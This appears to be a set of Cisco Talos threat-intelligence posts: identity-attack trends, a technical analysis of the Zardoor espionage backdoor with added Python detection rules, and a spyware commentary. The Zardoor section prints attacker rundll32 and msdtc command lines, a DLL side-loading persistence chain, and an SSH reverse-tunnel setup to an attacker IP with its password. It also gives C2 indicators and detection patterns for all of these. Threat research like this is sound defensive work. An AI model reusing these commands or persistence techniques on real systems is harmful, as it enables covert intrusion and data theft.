Input capture was seventh on the top 20 MITRE ATT&CK list. This is a technique where threat actors deploy methods to capture login data as it is entered by the user. The most prevalent type of input capture is keylogging, where adversaries log user keystrokes to intercept credentials as the user types them. Keylogging usually occurs after a user has already been the unwitting victim of credential theft via a phishing campaign or another means of access. 

Stealing or Forging Kerberos Tickets 

The stealing of Kerberos tickets was the ninth most common MITRE ATT&CK technique Talos observed in 2023. Kerberos is a network authentication protocol that authenticates service requests and grants a ticket for a secure connection. Bad actors will try to steal these tickets (or forge them) to gain unauthorized access.  

Targeting dormant accounts 

According to Oort data from 2022, dormant accounts represent almost a quarter of the average company’s total accounts, and these accounts are regularly targeted (over 500 times per month on average). Attackers will look for accounts that are not used regularly but still have network access (for example, an employee or a temporary contractor who left the company, but their access was never removed).  

Infostealers 

Infostealers, or information-stealing malware, appear frequently in Talos IR engagements. Infostealers can be used to gain access to any kind of sensitive information including financial details and even intellectual property. Most commonly, we see infostealers being used to access and collect user credentials. 

Brute force attacks 

If an attacker has part of the login details, they may use brute force techniques to repeatedly guess the password. These are not necessarily random guesses: attackers may use knowledge gained from other attacks or leaks, such as the ones listed above. This highlights the need for organizations to limit the number of consecutive failed logon attempts. 

Password spraying 

Password spraying is a specific kind of brute force attack, but instead of brute forcing a password on a single system, the actors use passwords from information leaks and try them on popular web services in the hope that users have reused their passwords. This greatly reduces the chance of detection and account lockout. 
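The brute force and password spraying techniques above need different detection logic, because spraying is built to stay below the per-account failure counters that lockout policies rely on. The following Python example is an added illustration, not code from the Talos post: it separates the two patterns over a constructed authentication log. The log format, the 10-minute window and the thresholds of five are assumptions.

```python
"""Added example, not part of the Talos post: separate brute-force bursts
(many failures against one account from one source) from password spraying
(one source touching many accounts with few attempts each). The log format,
thresholds and window are assumptions for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample authentication log: "<ISO timestamp> <user> <source IP> <FAIL|OK>"
SAMPLE_LOG = """\
2024-02-06T08:00:01 alice 203.0.113.5 FAIL
2024-02-06T08:00:20 alice 203.0.113.5 FAIL
2024-02-06T08:00:41 alice 203.0.113.5 FAIL
2024-02-06T08:01:02 alice 203.0.113.5 FAIL
2024-02-06T08:01:25 alice 203.0.113.5 FAIL
2024-02-06T08:01:50 alice 203.0.113.5 FAIL
2024-02-06T08:05:00 bob 192.0.2.10 FAIL
2024-02-06T08:05:15 bob 192.0.2.10 OK
2024-02-06T09:00:00 carol 198.51.100.7 FAIL
2024-02-06T09:00:30 dave 198.51.100.7 FAIL
2024-02-06T09:01:00 erin 198.51.100.7 FAIL
2024-02-06T09:01:30 frank 198.51.100.7 FAIL
2024-02-06T09:02:00 grace 198.51.100.7 FAIL
2024-02-06T09:02:30 heidi 198.51.100.7 FAIL
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (FAIL|OK)$")


def parse(log_text):
    """Parse log lines into (timestamp, user, source, result) tuples; skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, user, src, result = m.groups()
            events.append((datetime.fromisoformat(ts), user, src, result))
    return events


def max_in_window(timestamps, window):
    """Largest number of timestamps falling inside any single sliding window."""
    ts_sorted = sorted(timestamps)
    best = start = 0
    for end, ts in enumerate(ts_sorted):
        while ts - ts_sorted[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def max_distinct_users_in_window(pairs, window):
    """Largest number of distinct users seen from one source inside any sliding window."""
    pairs = sorted(pairs)  # (timestamp, user)
    counts = defaultdict(int)
    best = start = 0
    for end, (ts, user) in enumerate(pairs):
        counts[user] += 1
        while ts - pairs[start][0] > window:
            old_user = pairs[start][1]
            counts[old_user] -= 1
            if counts[old_user] == 0:
                del counts[old_user]
            start += 1
        best = max(best, len(counts))
    return best


def detect(events, window=timedelta(minutes=10), brute_threshold=5, spray_threshold=5):
    """Return {'brute_force': {(user, src): n}, 'password_spray': {src: n_users}}.

    Per-account failure counting (what lockout policies use) catches brute force
    but not spraying, because each sprayed account sees only one or two failures;
    the spray rule therefore counts distinct accounts per source instead."""
    per_account = defaultdict(list)
    per_source = defaultdict(list)
    for ts, user, src, result in events:
        if result != "FAIL":
            continue
        per_account[(user, src)].append(ts)
        per_source[src].append((ts, user))

    brute = {}
    for key, stamps in per_account.items():
        n = max_in_window(stamps, window)
        if n >= brute_threshold:
            brute[key] = n

    spray = {}
    for src, pairs in per_source.items():
        n = max_distinct_users_in_window(pairs, window)
        if n >= spray_threshold:
            spray[src] = n
    return {"brute_force": brute, "password_spray": spray}


if __name__ == "__main__":
    print(detect(parse(SAMPLE_LOG)))
```

On the constructed log, alice's six failures from one source trip the brute force rule, while 198.51.100.7 never fails twice against the same account and is caught only by the per-source distinct-user count; bob's single failure followed by a success fires nothing. In production the same two counters would be keyed on whatever source attribute survives NAT and proxies (a session or device identifier rather than a bare IP).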

QR code phishing 

According to public reporting, there has been a recent rise in QR code phishing to obtain user credentials. The Cisco Talos Incident Response team was recently called in to help with such an incident, in which credentials were stolen. A phishing email was sent to the company email accounts of several employees, and it contained a PDF with a malicious QR code. Some employees used their smartphones to scan the code, which paved the way for the attacker to obtain their credentials and log in to the organization’s systems. The exact reason the attacker was able to obtain the credentials is unknown due to a lack of logs on the smartphones, but one possibility is that passwords were saved in an unpatched browser. 

Going after the users 

Some of the above techniques can be addressed by defender tools and configurations within the organization’s network environment which allow for the detection of unauthorized access. But since there are many identity-type attacks that seek to manipulate or coerce the user themselves, we also need to talk about how users are being targeted today.  

I asked Talos’ Head of Outreach Nick Biasini what his main recommendations were for the coming year. He spoke about the increased targeting of users and how adversaries are getting more relentless in their attempts to gain valid credential-based access to a system. 

He mentioned that whilst the malware itself used to gain these credentials won’t necessarily be very sophisticated, it is more about the intensity of the attacks. Here are his insights in full:  

Phishing emails are one of the most common ways adversaries compromise victims (it was No. 3 in Talos’ list of initial access vectors for 2023 and has consistently been a top-ranked threat in Talos Incident Response findings for years). In the last year alone, 25% of the initial access vectors identified in Talos Incident Response engagements were comprised of phishing. This observation is consistent with U.S. government findings, with the FBI noting that phishing was the top incident reported to its Internet Crime Complaint Center (IC3) in 2022.  

Most people think of phishing/social engineering as clicking on a malicious link and triggering malware. But there are deeper aspects to these attacks that can involve manipulating users into doing the threat actors’ bidding. These are known as insider attacks. 

Insider attacks 

We still see cases of traditional malicious insiders, i.e., employees who deliberately want to damage their organization’s network, either for financial gain or out of frustration with the organization itself. But increasingly we are seeing another category of insider attacks: the “unwitting assets.”  

In the case of the unwitting asset, threat actors use social engineering to leverage the user to act on their behalf, typically through some form of manipulation. 

A common example is when an adversary concocts a story that implicates the user in some way, or there’s a problem that needs solving quickly. Adversaries, especially more sophisticated ones, will often ask for the target to get on a phone call to discuss the issue further.  

Once the attacker has someone on the phone, they unfortunately stand more of a chance of persuading the user to do the adversary’s bidding. This could include logging into devices and reconfiguring something or revealing important account details. 

Recommendations 

Identity related attacks are challenging to defend against. You’re dealing with the misuse of valid credentials. Finding the genuine source of them is especially difficult if users are being coerced to share their account details or conduct malicious activities. However, there are some practices we recommend that can help: 

  • Limit the amount of access a user has – no more than is required for them to perform their job.  
  • Limit the amount of consecutive failed login attempts to prevent possible brute force access. 
  • Ensure you are using MFA across your network. 
  • For IT administrators, ensure you are set up to inspect traffic laterally across the network, not just traffic going north/south. This will help catch attackers who are trying to move laterally. 
  • Have a defense-in-depth approach, so that if a portion of your defense fails, other defenses can detect anomalies and intrusions. 
  • Conduct routine auditing and ensure dormant accounts are deleted from the network. This will help prevent attackers using dormant accounts to try to gain access undetected. It’s also common for accounts to be set up to test new systems, so ensure these test accounts are only temporary. Set up an automated procedure for test accounts to be disabled at the end of the project. 
  • Additionally, disable the accounts of those who have left your organization and ensure you remove their remote access (i.e., through the VPN).  
  • Have a checks and balances system in place for dealing with financial transactions so that no single person can initiate and complete a wire transfer without additional approval. This can help mitigate social engineering attacks against users who deal with payments. 
  • Addressing the abuse of valid credentials involves a comprehensive set of security measures. Consider a zero-trust architecture approach which validates every user connection to every device and every application. This will help prevent threat actors operating under the radar and across your network with stolen credentials. 

And finally, we would recommend organizations to consider actively hunting for evidence of incursion. As well as finding possible breaches, you may also detect areas where your overall network security could be improved. You can read more about this in our blog “Beyond the basics: Implementing an active defense.” 

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

8 February 2024 at 13:00

By Jungsoo An, Wayne Lee and Vanja Svajcer.

  • Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 
  • We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. 
  • Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence. 
  • At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
  • Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.  

Talos discovered an ongoing espionage campaign in May 2023 targeting an Islamic charitable non-profit organization in Saudi Arabia that exfiltrates data approximately twice a month. 

The initial access vector is unknown; however, we observed the threat actor executing malware we are calling the “Zardoor” backdoor to gain persistence. We then observed the threat actor establishing C2 using open-source reverse proxy tools such as Fast Reverse Proxy (FRP), sSocks and Venom, a reverse proxy SOCKS5 server-client tool originally developed for penetration testers. 

The threat actor customized sSocks to remove dependencies on Visual C Runtime libraries so these tools would rely only on WinAPI libraries and therefore could be executed without unexpected runtime errors. 

Once a connection was established, the threat actor used Windows Management Instrumentation (WMI) to move laterally and spread the attacker's tools — including Zardoor — by spawning processes on the target system and executing commands received from the C2, as seen in the commands below.


Execution flow of the Zardoor backdoor

To maintain persistence, the attacker deployed a previously unseen backdoor family we have named Zardoor, after the file names “zar32.dll” and “zor32.dll”. “Zar32.dll” is the main backdoor component that communicates with the attacker’s C2, and “zor32.dll” ensures “zar32.dll” has been properly deployed with admin privileges. Talos could not obtain a sample of the dropper used in this specific campaign. However, we found and analyzed other available samples whose execution sequence and filenames are identical to the malicious activity we observed and which are possibly related to this attack. 

Based on our analysis of these matching samples, the execution sequence has two parts:

The dropper installs and executes the malicious “oci.dll”

The main purpose of this dropper is to configure “msdtc.exe” to load the malicious “oci.dll” payload. Depending on the target OS architecture, the dropper locates either a 32- or 64-bit “oci.dll” and drops it in the system file path C:\Windows\System32\. Then, the dropper will attempt to stop the MSDTC service and use “msdtc.exe” to help register the malicious “oci.dll” with admin privileges, using the command msdtc -install.

The dropper drops a different version of oci.dll based on the OS bitness and deletes itself using a batch file.

However, if the MSDTC service fails to stop, the dropper patches the binary of the malicious “oci.dll” file to remove the strings 1ISSYSTEM and 1ISAUTORUN, and saves the patched DLL to the file path %TEMP%\win_oci_41aa0d5.dll. Removing the strings later determines where “zar32.dll” and “zor32.dll” are saved on the victim’s computer. 

The threat actor then uses Rundll32 to execute the patched “oci.dll” using this command: C:\Windows\System32\rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry. This patched “oci.dll” will extract “zar32.dll” and “zor32.dll” into the Temp Directory, and launch “zar32.dll MainEntry” using “rundll32.exe”. The MSDTC service will register the malicious “oci.dll” with the msdtc -install command.

If either of these two actions is successful, the dropper configures the MSDTC service to load “oci.dll” and the DLL will be executed. Finally, a cleanup batch script is created and saved to the location %TEMP%\xz330ksdfg.bat. The batch script deletes the dropper and then deletes itself.


Malicious “oci.dll” payload

The malicious loader “oci.dll” contains the backdoor payloads “zar32.dll” and “zor32.dll” in its resource section. Oci.dll has two exported functions: ServiceMain() to launch the backdoor module (“zar32.dll”) and DllEntryPoint() to drop the backdoor onto the victim’s machine.

The ServiceMain() export is executed by the MSDTC service and launches the export function MainEntry of “zar32.dll” using “rundll32.exe.”

The DllEntryPoint() function calls the DLLMain function, which determines where to dump “zar32.dll” and “zor32.dll”. This occurs by searching for the strings 1ISSYSTEM and 1ISAUTORUN. If the string 1ISSYSTEM is found in “zar32.dll”, DLLMain drops “zar32.dll” and “zor32.dll” into the System32 directory.

If the string 1ISSYSTEM is not found, DLLMain looks for the string 1ISAUTORUN, and if it exists, DLLMain drops “zar32.dll” and “zor32.dll” into the %userprofile% directory. If neither string is found, DLLMain drops “zar32.dll” and “zor32.dll” into the %TEMP% directory. After the payloads are saved, the DLLs and their export function MainEntry() are launched by “rundll32.exe”.

The oci.dll contains two Zardoor components, zar32.dll and zor32.dll as resources.

To execute “zar32.dll”, the “oci.dll” export “ServiceMain()” is executed by “msdtc.exe” which then loads “zar32.dll” using the command: rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry. “Zor32.dll” is subsequently loaded from the same exported method with the command rundll32.exe C:\WINDOWS\system32\zor32.dll MainEntry.

Zardoor modules.

Analysis of the “zar32.dll” and “zor32.dll” backdoor files

“Zar32.dll” is an HTTP/SSL remote access tool (RAT) capable of sending encrypted data to the attacker’s C2, executing PE payloads in fileless mode, searching for session IDs, executing remote shellcode, and updating the C2 IP/hostname or port in memory. “Zar32.dll” contains the hardcoded debug symbol path seen below and has two export functions: MainEntry() and DllEntryPoint().

PDB file path : 'C:\\Users\\john\\Desktop\\RManager\\x64\\Release\\R_Run.pdb'

Once deployed, “zar32.dll” creates three mutexes with the names 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, ThreadMutex12453, and rrx_%d, where the value of %d is a random seed based on the DLL’s time of execution. If the mutex 3e603a07-7b2d-4a15-afef-7e9a0841e4d5 already exists, the DLL exits, because that indicates “zar32.dll” is already running successfully.

To establish a C2 connection, “zar32.dll” needs a program that allows network applications to operate through a SOCKS or HTTPS proxy. The DLL connects to the following URLs:

  • 1.0.0[.]1/index.html
  • 1.0.0[.]2/index.html
  • 1.0.0[.]3/index.htm

These IP addresses belong to Cloudflare’s DNS services, including DNS over HTTPS, and communication with them may indicate an attempt to bypass DNS-based detection of attacker-controlled C2 servers. 

“Zar32.dll” attempts to connect to its C2 server using SSL with the following HTTP User-Agents:

  • 64-bit application: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; Trident/7.0; rv:11.0) like Gecko
  • 32-bit application on 64-bit OS: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; WOW64; Trident/7.0; rv:11.0) like Gecko

Once a connection is successfully established, “zar32.dll” supports the following C2 commands:

  1. Encrypt and send data to C2.
  2. Execute remotely fetched PE payload.
  3. Search for session ID.
  4. (Plugin exit).
  5. Remote shellcode execution.
  6. Delete this RAT.
  7. Update C2 IP (IP/domain_name:port).
  8. Do nothing.

Zardoor (zar32.dll) C2 routine handles eight different C2 commands.

We also observed several dependencies in the malware’s execution routine. If “zar32.dll” is running when “zor32.dll” is installed, “zor32.dll” runs the “msdtc.exe” service installer. 

If “zar32.dll” is not running when “zor32.dll” is installed, then “zor32.dll” starts the “msdtc.exe” service and attempts to create a mutex with the name 6c2711b5-e736-4397-a883-0d181a3f85ae.

Next, “zor32.dll” checks whether the “oci.dll” file exists and finishes execution if it does not. If “oci.dll” exists, “zor32.dll” attempts to create another mutex with the name 3e603a07-7b2d-4a15-afef-7e9a0841e4d5. The DLL exits if the mutex exists, indicating “zar32.dll” is running successfully.

If the mutex does not exist, “zor32.dll” will attempt to re-launch “zar32.dll” up to 10 times.

We also identified “zor32.dll” performing the following checks to maintain persistence when the process has admin privileges:

  1. If the MSDTC service is not running, “zor32.dll” will configure the MSDTC service with the command msdtc -install. If the installation fails, it will keep attempting up to 10 times.
  2. “zor32.dll” attempts to query MSDTC service status and if this fails, it will attempt up to 10 times.
  3. If the MSDTC service is running, then “zor32.dll” will attempt to stop it. If this fails, it will keep attempting to install up to 10 times.
  4. If the MSDTC service is not running, “zor32.dll” will start the service.

Scheduled tasks to maintain persistence

For persistence, the threat actor registers their reverse proxies as scheduled tasks, causing the reverse proxy to execute approximately every 20 minutes and communicate with the attacker’s C2 servers. To achieve this, the threat actor first checks whether the victim already has scheduled tasks running with the names "KasperskySecurity" or "Microsoft Security Essentialss." Then, the attacker deletes the legitimate scheduled task and creates a new one with the same name for the proxy “msbuildss.exe”.
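The execution chain and persistence mechanisms described in this section (rundll32 launching zar32.dll/zor32.dll through the MainEntry export, the patched oci.dll loader written to %TEMP%, msdtc -install, the hijacked scheduled task names, and the beacons to 1.0.0.1-3 with a Trident user agent) translate directly into hunting rules. The following Python example is an added illustration by the editor, not Talos' code or the malware's: it runs those rules over constructed sample telemetry. The event schema, the file paths, the parent processes and the schtasks command line in the sample events are assumptions, not observations from the campaign.

```python
"""Added example, not from the Talos post or the Zardoor samples: simple hunting
rules for the Zardoor execution, persistence and C2 behaviours described above,
run over constructed sample telemetry. The event shape (dicts with a "type"
key) is an assumption, not any product's schema."""
import re

# Constructed sample events (not real telemetry). Paths and parents are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry",
     "parent": r"C:\Windows\System32\msdtc.exe"},
    {"type": "process", "image": r"C:\Windows\System32\msdtc.exe",
     "cmdline": "msdtc -install",
     "parent": r"C:\Users\victim\AppData\Local\Temp\dropper.exe"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe C:\Users\victim\AppData\Local\Temp\win_oci_41aa0d5.dll MainEntry",
     "parent": r"C:\Users\victim\AppData\Local\Temp\dropper.exe"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "KasperskySecurity" /tr C:\ProgramData\msbuildss.exe /sc minute /mo 20',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "network", "dst_ip": "1.0.0.1", "uri": "/index.html",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"},
    # Benign activity that must not fire
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "network", "dst_ip": "1.1.1.1", "uri": "/dns-query",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"},
]

# rundll32 invoking the Zardoor components by their MainEntry export
ZARDOOR_DLL = re.compile(r"\\(?:zar32|zor32)\.dll\b.*\bMainEntry\b", re.IGNORECASE)
# rundll32 invoking the patched oci.dll loader the dropper writes to %TEMP%
TEMP_OCI = re.compile(r"\\win_oci_[0-9a-f]+\.dll\b.*\bMainEntry\b", re.IGNORECASE)
# MSDTC service (re)installation, used by both the dropper and zor32.dll
MSDTC_INSTALL = re.compile(r"(?:^|\\|\s)msdtc(?:\.exe)?\s+-install\b", re.IGNORECASE)
# Task names the actor hijacked for the msbuildss.exe proxy
HIJACKED_TASKS = ("kasperskysecurity", "microsoft security essentialss")
# zar32.dll beacons to Cloudflare DNS IPs with an IE11-style Trident user agent;
# legitimate DoH to these IPs uses /dns-query, so the URI and UA separate the two
ZARDOOR_C2_IPS = {"1.0.0.1", "1.0.0.2", "1.0.0.3"}
TRIDENT_UA = re.compile(
    r"^Mozilla/5\.0 \(Windows NT \d+\.\d+; (?:WOW64; )?Trident/7\.0; rv:11\.0\) like Gecko$")


def evaluate(event):
    """Return the names of every hunting rule this single event matches."""
    hits = []
    if event["type"] == "process":
        image = event["image"].lower()
        cmd = event["cmdline"]
        if image.endswith("rundll32.exe"):
            if ZARDOOR_DLL.search(cmd):
                hits.append("zardoor_dll_mainentry")
            if TEMP_OCI.search(cmd):
                hits.append("patched_oci_loader_in_temp")
        if MSDTC_INSTALL.search(cmd):
            hits.append("msdtc_reinstall")  # a lead to triage, not a conviction
        low = cmd.lower()
        if image.endswith("schtasks.exe") and "/create" in low and any(n in low for n in HIJACKED_TASKS):
            hits.append("scheduled_task_masquerade")
    elif event["type"] == "network":
        if (event["dst_ip"] in ZARDOOR_C2_IPS and event["uri"].startswith("/index.htm")
                and TRIDENT_UA.match(event["user_agent"])):
            hits.append("zardoor_c2_beacon")
    return hits


def hunt(events):
    """Return (event_index, rule_name) pairs for every rule hit across the telemetry."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The msdtc -install rule is deliberately broad: an administrator can legitimately reinstall MSDTC, so it is a triage lead that becomes interesting when it appears alongside an oci.dll write to System32 or one of the rundll32 rules. The C2 rule keys on the combination of destination, URI and user agent, which is what keeps ordinary DNS-over-HTTPS traffic to Cloudflare from firing.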


Talos observed the threat actor in July 2023 storing the remote server’s public key for future tasks. This allows the threat actor to access the remote Secure Shell (SSH) server and set up remote port forwarding, which lets remote servers and devices on the internet reach devices on a private network. 

The attacker downloads the private SSH key and saves it to the file path c:\users\[Redacted]\.ssh\ with the filename “id_rsa.” The threat actor also saves the file “known_hosts”, containing the public keys of the hosts that can be accessed using the private key stored in “id_rsa”.


According to the above commands, the threat actor first downloads and checks the contents of the file “2.vbs” to ensure it is the script they would like to execute. The “2.vbs” file is responsible for setting up the SSH remote port forwarding from port 443 on the victim’s device to port 22 on the attacker’s server using the user name root. The file makes sure it has successfully set up the SSH forwarding server by performing the following steps:

  1. netstat -ano | findstr 70.34 is used to find part of the remote IP address 70[.]34[.]208[.]197.
  2. The executable “shd.exe” initiates an SSH connection using the username root and the password "3My[{BK)Ni8a".
  3. Look for a port 443 connection on the victim’s device and kill “ssh.exe” and “shd.exe” using the taskkill utility.

Reverse proxy tools used by the threat actor

Forward proxies are used to connect devices on a private network to internet services, usually HTTP-based. Reverse proxies, by contrast, allow a computer connected to the internet to create a tunnel and gain remote access to services on the local private network.

Reverse proxies are often used as legitimate load balancers in complex system and application architectures. However, malicious actors use them to establish communications with otherwise unreachable systems such as RDP servers, domain controllers, and file or database servers. 

Fast Reverse Proxy (FRP)

Fast Reverse Proxy (FRP) is a reverse proxy tool that can be used to make network services, often located behind a NAT or firewall, remotely accessible. FRP consists of two main components: the FRP client and the FRP server. The FRP client is responsible for forwarding local requests to the FRP server, which in turn redirects them to the internet. This allows applications running on devices behind the NAT or firewall to be accessible from the outside network.

Port 7000 is the default port used by the FRP server component, but it can be configured to suit the user’s needs. A basic setup involves installing the FRP server on a public server with a public IP, and the FRP client on the machine you want to expose. The client and server are configured via their respective INI configuration files. Once both are appropriately configured and started, services on the client’s machine become accessible via the server’s public IP and the specified ports.

FRP components and the basic usage.

Fast Reverse Proxy (FRP) has been reported to be used by several, predominantly Chinese threat actors to bypass network security measures and maintain persistence within a compromised network. By leveraging FRP, these threat actors can create a tunnel from a machine within the compromised network to an external server under their control. This allows them to exfiltrate data, deploy additional malicious tools, or carry out other activities while evading detection. 

The use of FRP, a legitimate and widely used tool, makes the malicious traffic harder to distinguish from normal network traffic, thereby increasing the stealthiness of the attack. However, in an environment where FRP is not normally used, the presence of an FRP client may be a good indicator of potential compromise. 

VirusTotal uploads for the FRP client executables.

FRP is a popular tool and has been increasingly used by threat actors, based on the increase in VirusTotal submissions of FRP tools over the past few years. 

Venom proxy

Venom is a multi-hop proxy designed for red teaming and pentesting written in the Go language. It allows the user to create a network of proxy nodes that can act as an admin or agent. The agent connects to either another agent or the admin node. The user controls the network through the control of the administration node and can easily add additional agents to the network. 

Venom allows the user, which could also be a malicious actor, to create a botnet of proxies that can be used to remotely control the nodes, exfiltrate data, install additional payloads, etc. 

The Venom features are:

  • Multi-hop socks5 proxy.
  • Multi-hop port forwarding.
  • SSH tunneling.
  • Interactive shell.
  • Uploading and downloading files.
  • Network traffic encryption.
  • Support of multiple platforms (Linux/Windows/MacOS) and multiple architectures (x86/x64/ARM/MIPS).

Other reverse proxy tools and their usage by threat actors

Based on previous Talos research and available open-source threat intelligence, threat actors, predominantly originating from China, use several other tools that support reverse proxying in addition to FRP and Venom, most commonly:

We have also created a matrix that displays the active threat groups and the proxy tools they are using. Talos assesses with low confidence that the existence of one or more of the tools on a compromised system may indicate the activity of a particular group, as these tools are easily reusable and can be employed by any malicious actor. 

Proxy tools and the threat actors utilizing them.

Zardoor attacks conducted by an advanced threat actor

Talos assesses this campaign was conducted by an unknown, advanced threat actor. We have not been able to attribute this activity to any known, publicly reported threat actor at this time, as we have not found any overlap between the tools or C2 infrastructure observed in this campaign and those of known actors. 

The threat actor appears highly skilled based on their ability to create new tooling, such as the Zardoor backdoors, customize open-source proxy tools, and leverage several LoLBins including “msdtc.exe” to evade detection. In particular, side-loading backdoors contained in “oci.dll” via MSDTC is a very effective method of remaining undetected while maintaining long-term access to a victim’s network. 

Coverage

Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61913, 61914 and 62371 - 62380.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

  • Win.Backdoor.Zardoor-10019732-0
  • Win.Backdoor.ZardoorVMP-10019731-0
  • Win.Backdoor.sSocksProxy-10019733-0
  • Win.Backdoor.VenomProxy-10019734-0

MITRE ATT&CK Techniques

Command and Control

  • T1090.003 Proxy: Multi-hop Proxy
  • T1105 Ingress Tool Transfer

Discovery

  • T1018 Remote System Discovery
  • T1033 System Owner/User Discovery
  • T1049 System Network Connections Discovery
  • T1057 Process Discovery
  • T1087.002 Account Discovery: Domain Account

Persistence

  • T1053.005 Scheduled Task/Job: Scheduled Task
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

Execution

  • T1047 Windows Management Instrumentation
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1204.002 User Execution: Malicious File
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

Exfiltration

  • T1048 Exfiltration Over Alternative Protocol

Privilege Escalation

  • T1055 Process Injection
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

Defense Evasion

  • T1055.001 Process Injection: Dynamic-link Library Injection
  • T1070.004 File Deletion
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

IOCs

IOCs for this research can also be found in our GitHub repository here.

Spyware isn’t going anywhere, and neither are its tactics

8 February 2024 at 19:00

Private and public efforts to curb the use of spyware and activity of other “mercenary” groups have heated up over the past week, with the U.S. government taking additional action against spyware users and some of the world’s largest tech companies calling out international governments to do more. 

The illegal use of spyware to target high-profile or at-risk individuals is a global problem, as highlighted by this article from The Register that Talos’ Nick Biasini just contributed to. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. And as we’ve written about, many Private Sector Offensive Actors (PSOAs) are developing spyware and selling it to whoever is willing to pay, regardless of what their motives are. 

A group of nations including the U.S., U.K. and France, along with several Fortune 500 tech companies, signed an agreement Tuesday to work to limit the use of spyware across the globe and crack down harder on bad actors who are illegally selling and using the software. However, the language of the resolution seemed closer to aspirations than actual action. 

For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware. The restrictions could also affect anyone who makes the spyware, profits off its sale or facilitates the sale of the technology.  

These are all positive steps in the right direction toward curbing the use and sale of commercial spyware, but I remain concerned that the tendrils of spyware are so deep in the security landscape at this point that we’ll be dealing with this issue for years to come. 

Google’s security research group recently found that 20 of the 25 zero-day vulnerabilities Google TAG discovered that were being exploited in the wild in 2023 were exploited by commercial spyware vendors. In the same report, Google TAG said it was actively tracking at least 40 commercial spyware vendors — all with an unknown number of customers, users, creators and employees.  

The general tenets of spyware are all around us, too. While not traditional commercial spyware that’s tracking journalists or dissidents, even just quiet trackers are being used all over the internet. 

A report from 404 Media last month found that the apps of several popular sites like the 9gag forum and Kik messaging app were part of a massive network of ad tracking. Reporters found that ads inside each app are sending information to a powerful mass monitoring tool, which is then advertised and sold to national security agencies. This information can quietly build profiles out of users that could be used in many ways (though hopefully just for targeted ads, in the absolute best-case scenario), including tracking their hobbies, family members and physical location. 

Meta’s popular social media sites Instagram and Facebook have their own sets of tracking tools that can even monitor users’ web activity outside of their apps and require users to manually turn that feature off. Some mercenary groups are even embedding spyware into online ads and spreading spyware with little to no protection on mobile devices. 

Just as with ransomware, the problem of addressing spyware and PSOAs is going to take an international, public-private effort, and it certainly won’t be solved overnight. But I believe it will take more than good faith resolutions to change the way our internet activity is tracked, and how attackers can exploit that in a worst-case scenario.  

One way we can start taking steps to immediately curb the spread of spyware is with greater communication. Talos encourages any organization, public or private, to publicly share actionable information or detection content related to spyware discovered in the wild. Public disclosures are often limited in the technical detail they provide about how the spyware itself works, or contain few IOCs. 

